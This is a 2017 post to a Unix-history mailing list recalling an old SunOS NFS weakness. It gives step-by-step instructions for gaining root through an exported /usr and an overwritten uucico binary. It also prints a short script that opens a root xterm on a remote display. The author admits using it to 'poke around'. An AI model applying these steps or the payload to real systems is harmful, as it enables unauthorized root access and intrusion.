From mboxrd@z Thu Jan 1 00:00:00 1970 From: krewat@kilonet.net (Arthur Krewat) Date: Fri, 29 Sep 2017 17:24:54 -0400 Subject: [TUHS] RFS was: Re: UNIX of choice these days? In-Reply-To: <6491AD5C-D08E-4374-9BDD-2BA97E630BE2@gmail.com> References: <201709291522.v8TFM4nq012088@farg.inf.ed.ac.uk> <6491AD5C-D08E-4374-9BDD-2BA97E630BE2@gmail.com> Message-ID: There was also a horrible bit of backdoor-ism that was exploitable with NFS on SunOS - and was there for at least 4.1.3 but I imagine it was around for a long time. If the /usr filesystem was exported, and you were either a "known host" or it was exported to (everyone) (and yes, there were a LOT of people that did this)... Mount it locally, become root, su - uucp, and go and change the mode on /usr/lib/uucp/uucico (which was owned by uucp) from setuid to writable. Overwrite with your binary or script of choice. Telnet to the exploited host, and /usr/lib/uucp/uucico was executed as root. I usually used: #!/bin/sh /usr/openwin/bin/xterm -display :0 I used this on a WAN back in the 90's - actually to reset a lost root password for someone, but also to poke around sometimes ;) I don't know why people exported /usr - but they did it a lot. On 9/29/2017 2:40 PM, Don Hopkins wrote: > I was able to nfs-mount a directory on one of cs.cmu.edu's servers from sun.com’s network with no problem. Ron may remember me warning him about that! > > -Don > > >